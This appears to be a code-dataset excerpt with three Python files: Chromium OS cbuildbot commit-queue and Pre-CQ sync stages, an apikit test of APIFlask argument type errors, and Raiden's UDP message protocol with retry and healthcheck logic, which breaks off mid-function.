# official manifest we get from manifest-versions.
with self.LocalizeManifest(
next_manifest, filter_cros=self._run.options.local) as new_manifest:
self.ManifestCheckout(new_manifest)
class MasterSlaveSyncStage(ManifestVersionedSyncStage):
"""Stage that generates a unique manifest file candidate, and sync's to it."""
# TODO(mtennant): Turn this into self._run.attrs.sub_manager or similar.
# An instance of lkgm_manager.LKGMManager for slave builds.
sub_manager = None
def __init__(self, builder_run, **kwargs):
super(MasterSlaveSyncStage, self).__init__(builder_run, **kwargs)
# lkgm_manager deals with making sure we're synced to whatever manifest
# we get back in GetNextManifest so syncing again is redundant.
self.skip_sync = True
self._chrome_version = None
def _GetInitializedManager(self, internal):
"""Returns an initialized lkgm manager.
Args:
internal: Boolean. True if this is using an internal manifest.
Returns:
lkgm_manager.LKGMManager.
"""
increment = self.VersionIncrementType()
return lkgm_manager.LKGMManager(
source_repo=self.repo,
manifest_repo=cbuildbot_config.GetManifestVersionsRepoUrl(
internal, read_only=False),
manifest=self._run.config.manifest,
build_names=self._run.GetBuilderIds(),
build_type=self._run.config.build_type,
incr_type=increment,
force=self._force,
branch=self._run.manifest_branch,
dry_run=self._run.options.debug,
master=self._run.config.master)
def Initialize(self):
"""Override: Creates an LKGMManager rather than a ManifestManager."""
self._InitializeRepo()
self.RegisterManifestManager(self._GetInitializedManager(self.internal))
if (self._run.config.master and self._GetSlaveConfigs()):
assert self.internal, 'Unified masters must use an internal checkout.'
MasterSlaveSyncStage.sub_manager = self._GetInitializedManager(False)
def ForceVersion(self, version):
manifest = super(MasterSlaveSyncStage, self).ForceVersion(version)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.BootstrapFromVersion(version)
return manifest
def GetNextManifest(self):
"""Gets the next manifest using LKGM logic."""
assert self.manifest_manager, \
'Must run Initialize before we can get a manifest.'
assert isinstance(self.manifest_manager, lkgm_manager.LKGMManager), \
'Manifest manager instantiated with wrong class.'
if self._run.config.master:
manifest = self.manifest_manager.CreateNewCandidate(
chrome_version=self._chrome_version)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.CreateFromManifest(
manifest, dashboard_url=self.ConstructDashboardURL())
return manifest
else:
return self.manifest_manager.GetLatestCandidate(
dashboard_url=self.ConstructDashboardURL())
def GetLatestChromeVersion(self):
"""Returns the version of Chrome to uprev."""
return cros_mark_chrome_as_stable.GetLatestRelease(gclient.GetBaseURLs()[0])
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
"""Performs the stage."""
if (self._chrome_rev == constants.CHROME_REV_LATEST and
self._run.config.master):
# PFQ master needs to determine what version of Chrome to build
# for all slaves.
self._chrome_version = self.GetLatestChromeVersion()
ManifestVersionedSyncStage.PerformStage(self)
class CommitQueueSyncStage(MasterSlaveSyncStage):
"""Commit Queue Sync stage that handles syncing and applying patches.
This stage handles syncing to a manifest, passing around that manifest to
other builders and finding the Gerrit Reviews ready to be committed and
applying them into its own checkout.
"""
def __init__(self, builder_run, **kwargs):
super(CommitQueueSyncStage, self).__init__(builder_run, **kwargs)
# Figure out the builder's name from the buildbot waterfall.
builder_name = self._run.config.paladin_builder_name
self.builder_name = builder_name if builder_name else self._run.config.name
# The pool of patches to be picked up by the commit queue.
# - For the master commit queue, it's initialized in GetNextManifest.
# - For slave commit queues, it's initialized in _SetPoolFromManifest.
#
# In all cases, the pool is saved to disk.
self.pool = None
def HandleSkip(self):
"""Handles skip and initializes validation pool from manifest."""
super(CommitQueueSyncStage, self).HandleSkip()
filename = self._run.options.validation_pool
if filename:
self.pool = validation_pool.ValidationPool.Load(filename,
metadata=self._run.attrs.metadata, record_patches=False)
else:
self._SetPoolFromManifest(self.manifest_manager.GetLocalManifest())
def _ChangeFilter(self, pool, changes, non_manifest_changes):
# First, look for changes that were tested by the Pre-CQ.
changes_to_test = []
for change in changes:
status = pool.GetCLStatus(PRE_CQ, change)
if status == manifest_version.BuilderStatus.STATUS_PASSED:
changes_to_test.append(change)
# If we only see changes that weren't verified by Pre-CQ, try all of the
# changes. This ensures that the CQ continues to work even if the Pre-CQ is
# down.
if not changes_to_test:
changes_to_test = changes
return changes_to_test, non_manifest_changes
def _SetPoolFromManifest(self, manifest):
"""Sets validation pool based on manifest path passed in."""
# Note that GetNextManifest() calls GetLatestCandidate() in this case,
# so the repo will already be sync'd appropriately. This means that
# AcquirePoolFromManifest does not need to sync.
self.pool = validation_pool.ValidationPool.AcquirePoolFromManifest(
manifest, self._run.config.overlays, self.repo,
self._run.buildnumber, self.builder_name,
self._run.config.master, self._run.options.debug,
metadata=self._run.attrs.metadata)
def GetNextManifest(self):
"""Gets the next manifest using LKGM logic."""
assert self.manifest_manager, \
'Must run Initialize before we can get a manifest.'
assert isinstance(self.manifest_manager, lkgm_manager.LKGMManager), \
'Manifest manager instantiated with wrong class.'
if self._run.config.master:
try:
# In order to acquire a pool, we need an initialized buildroot.
if not git.FindRepoDir(self.repo.directory):
self.repo.Initialize()
self.pool = pool = validation_pool.ValidationPool.AcquirePool(
self._run.config.overlays, self.repo,
self._run.buildnumber, self.builder_name,
self._run.options.debug,
check_tree_open=not self._run.options.debug or
self._run.options.mock_tree_status,
changes_query=self._run.options.cq_gerrit_override,
change_filter=self._ChangeFilter, throttled_ok=True,
metadata=self._run.attrs.metadata)
except validation_pool.TreeIsClosedException as e:
cros_build_lib.Warning(str(e))
return None
manifest = self.manifest_manager.CreateNewCandidate(validation_pool=pool)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.CreateFromManifest(
manifest, dashboard_url=self.ConstructDashboardURL())
return manifest
else:
manifest = self.manifest_manager.GetLatestCandidate(
dashboard_url=self.ConstructDashboardURL())
if manifest:
if self._run.config.build_before_patching:
pre_build_passed = self.RunPrePatchBuild()
cros_build_lib.PrintBuildbotStepName(
'CommitQueueSync : Apply Patches')
if not pre_build_passed:
cros_build_lib.PrintBuildbotStepText('Pre-patch build failed.')
self._SetPoolFromManifest(manifest)
self.pool.ApplyPoolIntoRepo()
return manifest
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
"""Performs normal stage and prints blamelist at end."""
if self._run.options.force_version:
self.HandleSkip()
else:
ManifestVersionedSyncStage.PerformStage(self)
class PreCQSyncStage(SyncStage):
"""Sync and apply patches to test if they compile."""
def __init__(self, builder_run, patches, **kwargs):
super(PreCQSyncStage, self).__init__(builder_run, **kwargs)
# The list of patches to test.
self.patches = patches
# The ValidationPool of patches to test. Initialized in PerformStage, and
# refreshed after bootstrapping by HandleSkip.
self.pool = None
def HandleSkip(self):
"""Handles skip and loads validation pool from disk."""
super(PreCQSyncStage, self).HandleSkip()
filename = self._run.options.validation_pool
if filename:
self.pool = validation_pool.ValidationPool.Load(filename,
metadata=self._run.attrs.metadata)
def PerformStage(self):
super(PreCQSyncStage, self).PerformStage()
self.pool = validation_pool.ValidationPool.AcquirePreCQPool(
self._run.config.overlays, self._build_root,
self._run.buildnumber, self._run.config.name,
dryrun=self._run.options.debug_forced, changes=self.patches,
metadata=self._run.attrs.metadata)
self.pool.ApplyPoolIntoRepo()
if len(self.pool.changes) == 0:
cros_build_lib.Die('No changes have been applied.')
class PreCQLauncherStage(SyncStage):
"""Scans for CLs and automatically launches Pre-CQ jobs to test them."""
STATUS_INFLIGHT = validation_pool.ValidationPool.STATUS_INFLIGHT
STATUS_PASSED = validation_pool.ValidationPool.STATUS_PASSED
STATUS_FAILED = validation_pool.ValidationPool.STATUS_FAILED
STATUS_LAUNCHING = validation_pool.ValidationPool.STATUS_LAUNCHING
STATUS_WAITING = validation_pool.ValidationPool.STATUS_WAITING
# The number of minutes we allow before considering a launch attempt failed.
# If this window isn't hit in a given launcher run, the window will start
# again from scratch in the next run.
LAUNCH_DELAY = 30
# The number of minutes we allow before considering an in-flight
# job failed. If this window isn't hit in a given launcher run, the window
# will start again from scratch in the next run.
INFLIGHT_DELAY = 120
# The maximum number of patches we will allow in a given trybot run. This is
# needed because our trybot infrastructure can only handle so many patches at
# once.
MAX_PATCHES_PER_TRYBOT_RUN = 50
def __init__(self, builder_run, **kwargs):
super(PreCQLauncherStage, self).__init__(builder_run, **kwargs)
self.skip_sync = True
# Mapping from launching changes to the first known time when they
# were launching.
self.launching = {}
# Mapping from inflight changes to the first known time when they
# were inflight.
self.inflight = {}
self.retried = set()
def _HasLaunchTimedOut(self, change):
"""Check whether a given |change| has timed out on its trybot launch.
Assumes that the change is in the middle of being launched.
Returns:
True if the change has timed out. False otherwise.
"""
diff = datetime.timedelta(minutes=self.LAUNCH_DELAY)
return datetime.datetime.now() - self.launching[change] > diff
def _HasInflightTimedOut(self, change):
"""Check whether a given |change| has timed out while trybot inflight.
Assumes that the change's trybot is inflight.
Returns:
True if the change has timed out. False otherwise.
"""
diff = datetime.timedelta(minutes=self.INFLIGHT_DELAY)
return datetime.datetime.now() - self.inflight[change] > diff
@staticmethod
def _PrintPatchStatus(patch, status):
"""Print a link to |patch| with |status| info."""
items = (
status,
os.path.basename(patch.project),
str(patch),
)
cros_build_lib.PrintBuildbotLink(' | '.join(items), patch.url)
def GetPreCQStatus(self, pool, changes):
"""Get the Pre-CQ status of a list of changes.
Side effect: reject or retry changes that have timed out.
Args:
pool: The validation pool.
changes: Changes to examine.
Returns:
busy: The set of CLs that are currently being tested.
passed: The set of CLs that have been verified.
"""
busy, passed = set(), set()
for change in changes:
status = pool.GetCLStatus(PRE_CQ, change)
if status != self.STATUS_LAUNCHING:
# The trybot is not launching, so we should remove it from our
# launching timeout map.
self.launching.pop(change, None)
if status != self.STATUS_INFLIGHT:
# The trybot is not inflight, so we should remove it from our
# inflight timeout map.
self.inflight.pop(change, None)
if status == self.STATUS_LAUNCHING:
# The trybot is in the process of launching.
busy.add(change)
if change not in self.launching:
# Record the launch time of changes.
self.launching[change] = datetime.datetime.now()
elif self._HasLaunchTimedOut(change):
if change in self.retried:
msg = ('We were not able to launch a pre-cq trybot for your change.'
'\n\n'
'This problem can happen if the trybot waterfall is very '
'busy, or if there is an infrastructure issue. Please '
'notify the sheriff and mark your change as ready again. If '
'this problem occurs multiple times in a row, please file a '
'bug.')
pool.SendNotification(change, '%(details)s', details=msg)
pool.RemoveCommitReady(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_FAILED,
self._run.options.debug)
self.retried.discard(change)
else:
# Try the change again.
self.retried.add(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_WAITING,
self._run.options.debug)
elif status == self.STATUS_INFLIGHT:
# Once a Pre-CQ run actually starts, it'll set the status to
# STATUS_INFLIGHT.
busy.add(change)
if change not in self.inflight:
# Record the inflight start time.
self.inflight[change] = datetime.datetime.now()
elif self._HasInflightTimedOut(change):
msg = ('The pre-cq trybot for your change timed out after %s minutes.'
'\n\n'
'This problem can happen if your change causes the builder '
'to hang, or if there is some infrastructure issue. If your '
'change is not at fault you may mark your change as ready '
'again. If this problem occurs multiple times please notify '
'the sheriff and file a bug.' % self.INFLIGHT_DELAY)
pool.SendNotification(change, '%(details)s', details=msg)
pool.RemoveCommitReady(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_FAILED,
self._run.options.debug)
elif status == self.STATUS_FAILED:
# The Pre-CQ run failed for this change. It's possible that we got
# unlucky and this change was just marked as 'Not Ready' by a bot. To
# test this, mark the CL as 'waiting' for now. If the CL is still marked
# as 'Ready' next time we check, we'll know the CL is truly still ready.
busy.add(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_WAITING,
self._run.options.debug)
self._PrintPatchStatus(change, 'failed')
elif status == self.STATUS_PASSED:
passed.add(change)
self._PrintPatchStatus(change, 'passed')
return busy, passed
def LaunchTrybot(self, pool, plan):
"""Launch a Pre-CQ run with the provided list of CLs.
Args:
pool: ValidationPool corresponding to |plan|.
plan: The list of patches to test in the Pre-CQ run.
"""
cmd = ['cbuildbot', '--remote', constants.PRE_CQ_BUILDER_NAME]
if self._run.options.debug:
cmd.append('--debug')
for patch in plan:
cmd += ['-g', cros_patch.AddPrefix(patch, patch.gerrit_number)]
self._PrintPatchStatus(patch, 'testing')
cros_build_lib.RunCommand(cmd, cwd=self._build_root)
for patch in plan:
if pool.GetCLStatus(PRE_CQ, patch) != self.STATUS_PASSED:
pool.UpdateCLStatus(PRE_CQ, patch, self.STATUS_LAUNCHING,
self._run.options.debug)
def GetDisjointTransactionsToTest(self, pool, changes):
"""Get the list of disjoint transactions to test.
Side effect: reject or retry changes that have timed out.
Returns:
A list of disjoint transactions to test. Each transaction should be sent
to a different Pre-CQ trybot.
"""
busy, passed = self.GetPreCQStatus(pool, changes)
# Create a list of disjoint transactions to test.
manifest = git.ManifestCheckout.Cached(self._build_root)
plans = pool.CreateDisjointTransactions(
manifest, max_txn_length=self.MAX_PATCHES_PER_TRYBOT_RUN)
for plan in plans:
# If any of the CLs in the plan are currently "busy" being tested,
# wait until they're done before launching our trybot run. This helps
# avoid race conditions.
#
# Similarly, if all of the CLs in the plan have already been validated,
# there's no need to launch a trybot run.
plan = set(plan)
if plan.issubset(passed):
logging.info('CLs already verified: %r', ' '.join(map(str, plan)))
elif plan.intersection(busy):
logging.info('CLs currently being verified: %r',
' '.join(map(str, plan.intersection(busy))))
if plan.difference(busy):
logging.info('CLs waiting on verification of dependencies: %r',
' '.join(map(str, plan.difference(busy))))
else:
yield plan
def ProcessChanges(self, pool, changes, _non_manifest_changes):
"""Process a list of changes that were marked as Ready.
From our list of changes that were marked as Ready, we create a
list of disjoint transactions and send each one to a separate Pre-CQ
trybot.
Non-manifest changes are just submitted here because they don't need to be
verified by either the Pre-CQ or CQ.
"""
# Submit non-manifest changes if we can.
if tree_status.IsTreeOpen():
pool.SubmitNonManifestChanges(check_tree_open=False)
# Launch trybots for manifest changes.
for plan in self.GetDisjointTransactionsToTest(pool, changes):
self.LaunchTrybot(pool, plan)
# Tell ValidationPool to keep waiting for more changes until we hit
# its internal timeout.
return [], []
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
# Setup and initialize the repo.
super(PreCQLauncherStage, self).PerformStage()
# Loop through all of the changes until we hit a timeout.
validation_pool.ValidationPool.AcquirePool(
self._run.config.overlays, self.repo,
self._run.buildnumber,
constants.PRE_CQ_LAUNCHER_NAME,
dryrun=self._run.options.debug,
changes_query=self._run.options.cq_gerrit_override,
check_tree_open=False, change_filter=self.ProcessChanges,
metadata=self._run.attrs.metadata)
|
bsd-3-clause
| -4,545,775,359,455,105,000 | 38.317003 | 80 | 0.684405 | false |
lsst-sqre/sqre-apikit
|
tests/test_lsstflask_type_errors.py
|
1
|
1993
|
#!/usr/bin/env python
"""Test APIFlask class for input parameters causing TypeErrors.
"""
import apikit
import pytest
def test_lsstflask_type_errors():
"""Test APIFlask for input parameters causing TypeErrors.
"""
# No arguments at all.
# Obviously the linter is correct here...
with pytest.raises(TypeError):
# pylint: disable=no-value-for-parameter
apikit.APIFlask()
# Name is not a string
with pytest.raises(TypeError):
apikit.APIFlask(("Beer", "me"), "2.0", "http://example.repo",
"BobApp")
# Version is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, "http://example.repo", "BobApp")
# Repository is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, ["repo", "man"], "BobApp")
# Description is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, "", "http://example.repo",
{"totally": "bogus"})
# Auth is not None, the empty string or "none", or a dict
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo",
"BobApp", auth=5)
# Auth is not None, the empty string or "none", or a dict
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
auth="bob")
# Api_version is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
api_version=5, auth="")
# Route is not None, a string, or a list of strings
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
route=2)
# Route is a list that contains a non-string
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
route=[2])
|
mit
| -3,355,852,424,482,573,300 | 39.673469 | 70 | 0.582037 | false |
tomashaber/raiden
|
raiden/network/protocol.py
|
1
|
24753
|
# -*- coding: utf-8 -*-
import logging
import random
from collections import (
namedtuple,
defaultdict,
)
from itertools import repeat
import cachetools
import gevent
from gevent.event import (
_AbstractLinkable,
AsyncResult,
Event,
)
from ethereum import slogging
from raiden.exceptions import (
InvalidAddress,
InvalidLocksRoot,
InvalidNonce,
TransferWhenClosed,
TransferUnwanted,
UnknownAddress,
UnknownTokenAddress,
)
from raiden.constants import (
UDP_MAX_MESSAGE_SIZE,
)
from raiden.settings import (
CACHE_TTL,
)
from raiden.messages import decode, Ack, Ping, SignedMessage
from raiden.utils import isaddress, sha3, pex
from raiden.utils.notifying_queue import NotifyingQueue
log = slogging.get_logger(__name__) # pylint: disable=invalid-name
ping_log = slogging.get_logger(__name__ + '.ping') # pylint: disable=invalid-name
# - async_result available for code that wants to block on message acknowledgment
# - receiver_address used to tie back the echohash to the receiver (mainly for
# logging purposes)
SentMessageState = namedtuple('SentMessageState', (
'async_result',
'receiver_address',
))
HealthEvents = namedtuple('HealthEvents', (
'event_healthy',
'event_unhealthy',
))
NODE_NETWORK_UNKNOWN = 'unknown'
NODE_NETWORK_UNREACHABLE = 'unreachable'
NODE_NETWORK_REACHABLE = 'reachable'
# GOALS:
# - Each netting channel must have the messages processed in-order, the
# protocol must detect unacknowledged messages and retry them.
# - A queue must not stall because of synchronization problems in other queues.
# - Assuming a queue can stall, the unhealthiness of a node must not be
# inferred from the lack of acknowledgement from a single queue, but healthiness
# may be safely inferred from it.
# - The state of the node must be synchronized among all tasks that are
# handling messages.
def event_first_of(*events):
""" Waits until one of `events` is set.
The returned event is /not/ cleared when any of the `events` are cleared; this
value must not be reused if the clearing behavior is relied upon.
"""
first_finished = Event()
if not all(isinstance(e, _AbstractLinkable) for e in events):
raise ValueError('all events must be linkable')
for event in events:
event.rawlink(lambda _: first_finished.set())
return first_finished
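# Illustrative sketch (assumed usage, not part of the original code): the
# combined event latches the first set() and is never cleared by the inputs.
#
#     e1, e2 = Event(), Event()
#     first = event_first_of(e1, e2)
#     e1.set()    # first.is_set() -> True
#     e1.clear()  # first stays set; it cannot be reused to wait again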
def timeout_exponential_backoff(retries, timeout, maximum):
""" Timeouts generator with an exponential backoff strategy.
Timeouts start spaced by `timeout`; after `retries` attempts the delays
increase exponentially up to `maximum`, which is then returned indefinitely.
"""
yield timeout
tries = 1
while tries < retries:
tries += 1
yield timeout
while timeout < maximum:
timeout = min(timeout * 2, maximum)
yield timeout
while True:
yield maximum
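# Illustrative sketch of the schedule (hypothetical parameters, not from the
# original settings): with retries=3, timeout=1 and maximum=8 the generator
# yields 1, 1, 1, 2, 4, 8 and then 8 forever.
#
#     backoff = timeout_exponential_backoff(3, 1, 8)
#     [next(backoff) for _ in range(7)]  # -> [1, 1, 1, 2, 4, 8, 8]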
def retry(protocol, data, receiver_address, event_stop, timeout_backoff):
""" Send data until it's acknowledged.
Exits when the first of the following happen:
- The packet is acknowledged.
- Event_stop is set.
- The iterator timeout_backoff runs out of values.
Returns:
bool: True if the message was acknowledged, False otherwise.
"""
async_result = protocol.send_raw_with_result(
data,
receiver_address,
)
event_quit = event_first_of(
async_result,
event_stop,
)
for timeout in timeout_backoff:
if event_quit.wait(timeout=timeout) is True:
break
protocol.send_raw_with_result(
data,
receiver_address,
)
return async_result.ready()
def wait_recovery(event_stop, event_healthy):
event_first_of(
event_stop,
event_healthy,
).wait()
if event_stop.is_set():
return
# There may be multiple threads waiting, do not restart them all at
# once to avoid message flood.
gevent.sleep(random.random())
def retry_with_recovery(
protocol,
data,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
backoff):
""" Send data while the node is healthy until it's acknowledged.
Note:
backoff must be an infinite iterator, otherwise this task will
become a hot loop.
"""
# The underlying unhealthy event will be cleared; care must be taken to
# properly clear stop_or_unhealthy too.
stop_or_unhealthy = event_first_of(
event_stop,
event_unhealthy,
)
acknowledged = False
while not event_stop.is_set() and not acknowledged:
# Packets must not be sent to an unhealthy node, nor should the task
# wait for it to become available if the message has been acknowledged.
if event_unhealthy.is_set():
wait_recovery(
event_stop,
event_healthy,
)
# Assume wait_recovery returned because unhealthy was cleared and
# continue execution, this is safe to do because event_stop is
# checked below.
stop_or_unhealthy.clear()
if event_stop.is_set():
return
acknowledged = retry(
protocol,
data,
receiver_address,
# retry will stop when this event is set, allowing this task to
# wait for recovery when the node becomes unhealthy or to quit if
# the stop event is set.
stop_or_unhealthy,
# Intentionally reusing backoff to restart from the last
# timeout/number of iterations.
backoff,
)
return acknowledged
def single_queue_send(
protocol,
receiver_address,
queue,
event_stop,
event_healthy,
event_unhealthy,
message_retries,
message_retry_timeout,
message_retry_max_timeout):
""" Handles a single message queue for `receiver_address`.
Notes:
- This task must be the only consumer of queue.
- This task can be killed at any time, but the intended usage is to stop it
with the event_stop.
- If there are many queues for the same receiver_address, it is the
caller's responsibility to not start them together to avoid congestion.
- This task assumes the endpoint is never cleared after it's first known.
If this assumption changes the code must be updated to handle unknown
addresses.
"""
# A NotifyingQueue is required to implement cancelability, otherwise the
# task cannot be stopped while the greenlet waits for an element to be
# inserted in the queue.
if not isinstance(queue, NotifyingQueue):
raise ValueError('queue must be a NotifyingQueue.')
# The event is reused, so clearing it must be done carefully
data_or_stop = event_first_of(
queue,
event_stop,
)
# Wait for the endpoint registration or to quit
event_first_of(
event_healthy,
event_stop,
).wait()
while True:
data_or_stop.wait()
if event_stop.is_set():
return
# The queue is not empty at this point, so this won't raise Empty.
# This task being the only consumer is a requirement.
data = queue.peek(block=False)
backoff = timeout_exponential_backoff(
message_retries,
message_retry_timeout,
message_retry_max_timeout,
)
acknowledged = retry_with_recovery(
protocol,
data,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
backoff,
)
if acknowledged:
queue.get()
# Checking the length of the queue does not trigger a
# context-switch, so it's safe to assume the length of the queue
# won't change under our feet, and when a new item is added the
# event will be set again.
if not queue:
data_or_stop.clear()
if event_stop.is_set():
return
def healthcheck(
protocol,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout,
ping_nonce):
""" Sends a periodical Ping to `receiver_address` to check its health. """
# The state of the node is unknown, the events are set to allow the tasks
# to do work.
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_UNKNOWN,
)
# Always call `clear` before `set`; since only `set` context-switches,
# it's easier to reason about tasks that are waiting on both events.
# Wait for the end-point registration or for the node to quit
try:
protocol.get_host_port(receiver_address)
except UnknownAddress:
event_healthy.clear()
event_unhealthy.set()
backoff = timeout_exponential_backoff(
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout,
)
sleep = next(backoff)
while not event_stop.wait(sleep):
try:
protocol.get_host_port(receiver_address)
except UnknownAddress:
sleep = next(backoff)
else:
break
# Don't wait to send the first Ping and to start sending messages if the
# endpoint is known
sleep = 0
event_unhealthy.clear()
event_healthy.set()
while not event_stop.wait(sleep):
sleep = nat_keepalive_timeout
ping_nonce['nonce'] += 1
data = protocol.get_ping(
ping_nonce['nonce'],
)
# Send Ping a few times before setting the node as unreachable
acknowledged = retry(
protocol,
data,
receiver_address,
event_stop,
[nat_keepalive_timeout] * nat_keepalive_retries,
)
if event_stop.is_set():
return
if not acknowledged:
# The node is not healthy, clear the event to stop all queue
# tasks
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_UNREACHABLE,
)
event_healthy.clear()
event_unhealthy.set()
# Retry until recovery, used for:
# - Checking node status.
# - Nat punching.
acknowledged = retry(
protocol,
data,
receiver_address,
event_stop,
repeat(nat_invitation_timeout),
)
if acknowledged:
event_unhealthy.clear()
event_healthy.set()
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_REACHABLE,
)
class RaidenProtocol(object):
""" Encode the message into a packet and send it.
Each message received is stored by hash and if it is received twice the
previous answer is resent.
Repeat sending messages until an acknowledgment is received or the maximum
number of retries is hit.
"""
def __init__(
self,
transport,
discovery,
raiden,
retry_interval,
retries_before_backoff,
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout):
self.transport = transport
self.discovery = discovery
self.raiden = raiden
self.retry_interval = retry_interval
self.retries_before_backoff = retries_before_backoff
self.nat_keepalive_retries = nat_keepalive_retries
self.nat_keepalive_timeout = nat_keepalive_timeout
self.nat_invitation_timeout = nat_invitation_timeout
self.event_stop = Event()
self.channel_queue = dict() # TODO: Change keys to the channel address
self.greenlets = list()
self.addresses_events = dict()
self.nodeaddresses_networkstatuses = defaultdict(lambda: NODE_NETWORK_UNKNOWN)
# Maps the echohash of received and *successfully* processed messages to
# their Ack, used to ignore duplicate messages and resend the Ack.
self.receivedhashes_to_acks = dict()
# Maps the echohash to a SentMessageState
self.senthashes_to_states = dict()
# Maps the addresses to a dict with the latest nonce (using a dict
# because python integers are immutable)
self.nodeaddresses_to_nonces = dict()
cache = cachetools.TTLCache(
maxsize=50,
ttl=CACHE_TTL,
)
cache_wrapper = cachetools.cached(cache=cache)
self.get_host_port = cache_wrapper(discovery.get)
def start(self):
self.transport.start()
def stop_and_wait(self):
# Stop handling incoming packets, but don't close the socket. The
# socket can only be safely closed after all outgoing tasks are stopped
self.transport.stop_accepting()
# Stop processing the outgoing queues
self.event_stop.set()
gevent.wait(self.greenlets)
# All outgoing tasks are stopped. Now it's safe to close the socket. At
# this point there might be some incoming message being processed,
# keeping the socket open is not useful for these.
self.transport.stop()
# Set all the pending results to False
for waitack in self.senthashes_to_states.itervalues():
waitack.async_result.set(False)
def get_health_events(self, receiver_address):
""" Starts a healthcheck taks for `receiver_address` and returns a
HealthEvents with locks to react on its current state.
"""
if receiver_address not in self.addresses_events:
self.start_health_check(receiver_address)
return self.addresses_events[receiver_address]
def start_health_check(self, receiver_address):
""" Starts a task for healthchecking `receiver_address` if there is not
one yet.
"""
if receiver_address not in self.addresses_events:
ping_nonce = self.nodeaddresses_to_nonces.setdefault(
receiver_address,
{'nonce': 0}, # HACK: Allows the task to mutate the object
)
events = HealthEvents(
event_healthy=Event(),
event_unhealthy=Event(),
)
self.addresses_events[receiver_address] = events
self.greenlets.append(gevent.spawn(
healthcheck,
self,
receiver_address,
self.event_stop,
events.event_healthy,
events.event_unhealthy,
self.nat_keepalive_retries,
self.nat_keepalive_timeout,
self.nat_invitation_timeout,
ping_nonce,
))
def get_channel_queue(self, receiver_address, token_address):
key = (
receiver_address,
token_address,
)
if key in self.channel_queue:
return self.channel_queue[key]
queue = NotifyingQueue()
self.channel_queue[key] = queue
events = self.get_health_events(receiver_address)
self.greenlets.append(gevent.spawn(
single_queue_send,
self,
receiver_address,
queue,
self.event_stop,
events.event_healthy,
events.event_unhealthy,
self.retries_before_backoff,
self.retry_interval,
self.retry_interval * 10,
))
if log.isEnabledFor(logging.DEBUG):
log.debug(
'new queue created for',
node=pex(self.raiden.address),
token=pex(token_address),
to=pex(receiver_address),
)
return queue
def send_async(self, receiver_address, message):
if not isaddress(receiver_address):
raise ValueError('Invalid address {}'.format(pex(receiver_address)))
if isinstance(message, (Ack, Ping)):
raise ValueError('Do not use send for Ack or Ping messages')
# Messages that are not unique per receiver can result in hash
# collision, e.g. Secret messages. The hash collision has the undesired
# effect of aborting message resubmission once /one/ of the nodes
# replied with an Ack; the receiver address is added into the echohash to
# avoid these collisions.
messagedata = message.encode()
echohash = sha3(messagedata + receiver_address)
if len(messagedata) > UDP_MAX_MESSAGE_SIZE:
raise ValueError(
'message size exceeds the maximum {}'.format(UDP_MAX_MESSAGE_SIZE)
)
# All messages must be ordered, but only on a per channel basis.
token_address = getattr(message, 'token', '')
# Ignore duplicated messages
if echohash not in self.senthashes_to_states:
async_result = AsyncResult()
self.senthashes_to_states[echohash] = SentMessageState(
async_result,
receiver_address,
)
queue = self.get_channel_queue(
receiver_address,
token_address,
)
if log.isEnabledFor(logging.DEBUG):
log.debug(
'SENDING MESSAGE',
to=pex(receiver_address),
node=pex(self.raiden.address),
message=message,
echohash=pex(echohash),
)
queue.put(messagedata)
else:
waitack = self.senthashes_to_states[echohash]
async_result = waitack.async_result
return async_result
def send_and_wait(self, receiver_address, message, timeout=None):
"""Sends a message and wait for the response ack."""
async_result = self.send_async(receiver_address, message)
return async_result.wait(timeout=timeout)
def maybe_send_ack(self, receiver_address, ack_message):
""" Send ack_message to receiver_address if the transport is running. """
if not isaddress(receiver_address):
raise ValueError('Invalid address {}'.format(pex(receiver_address)))
if not isinstance(ack_message, Ack):
raise ValueError('Use maybe_send_ack only for Ack messages')
messagedata = ack_message.encode()
self.receivedhashes_to_acks[ack_message.echo] = (receiver_address, messagedata)
self._maybe_send_ack(*self.receivedhashes_to_acks[ack_message.echo])
def _maybe_send_ack(self, receiver_address, messagedata):
""" ACK must not go into the queue, otherwise nodes will deadlock
waiting for the confirmation.
"""
host_port = self.get_host_port(receiver_address)
# ACKs are sent at the end of the receive method, after the message is
# successfully processed. It may be the case that the server is stopped
# after the message is received but before the ack is sent; under that
# circumstance the udp socket would be unavailable and an exception
# would be raised.
#
# This check verifies the udp socket is still available before trying
# to send the ack. There must be *no context-switches after this test*.
if self.transport.server.started:
self.transport.send(
self.raiden,
host_port,
messagedata,
)
def get_ping(self, nonce):
""" Returns a signed Ping message.
Note: Ping messages don't have an enforced ordering, so a Ping message
with a higher nonce may be acknowledged first.
"""
message = Ping(nonce)
self.raiden.sign(message)
message_data = message.encode()
return message_data
def send_raw_with_result(self, data, receiver_address):
""" Sends data to receiver_address and returns an AsyncResult that will
be set once the message is acknowledged.
